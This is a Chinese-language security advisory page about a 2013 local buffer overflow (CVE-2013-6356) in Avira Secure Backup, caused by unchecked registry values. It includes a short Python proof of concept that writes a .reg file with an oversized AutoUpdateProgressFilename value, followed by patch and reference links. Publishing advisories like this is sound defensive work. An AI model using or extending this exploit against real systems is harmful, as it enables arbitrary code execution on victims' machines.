当前位置: 首页 > 服务与支持 > 产品升级公告 > 安全漏洞公告

服务与支持Support

Avira Secure Backup本地缓冲区溢出漏洞

信息来源:Julien Ahrens      发表日期:2013-07-01 11:46:00

Avira Secure Backup是在线存储解决方案。

Avira Secure Backup 1.0.0.2.3630及其他版本在启动时从"HKEY_CURRENT_USER\\Software\\Avira Secure Backup"加载注册表值"AutoUpdateDownloadFilename"及"AutoUpdateProgressFilename",但没有进行有效的边界检查,在实现上存在缓冲区溢出漏洞,攻击者可利用此漏洞在受影响应用上下文中执行任意代码。

 

BUGTRAQ-ID:63765

CVE-ID:2013-6356

受影响系统:

AVIRA Secure Backup 1.0.0.2.3630

 

测试方法:

警  告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!#!/usr/bin/python

file="poc.reg"

 

junk1="\\xCC" * 1240

 

poc="Windows Registry Editor Version 5.00\\n\\n"

poc=poc + "[HKEY_CURRENT_USER\\Software\\Avira Secure Backup]\\n"

poc=poc + "\\"AutoUpdateProgressFilename\\"=\\"" + junk1 + "\\""

 

try:

print "[*] Creating exploit file...\\n";

writeFile = open (file, "w")

writeFile.write( poc )

writeFile.close()

print "[*] File successfully created!";

except:

print "[!] Error while creating file!";

解决办法:

厂商补丁:

 

AVIRA

-----

目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

 

http://www.avira.com/en/secure-backup-email-v1

参考信息:

http://www.securityfocus.com/archive/1/529854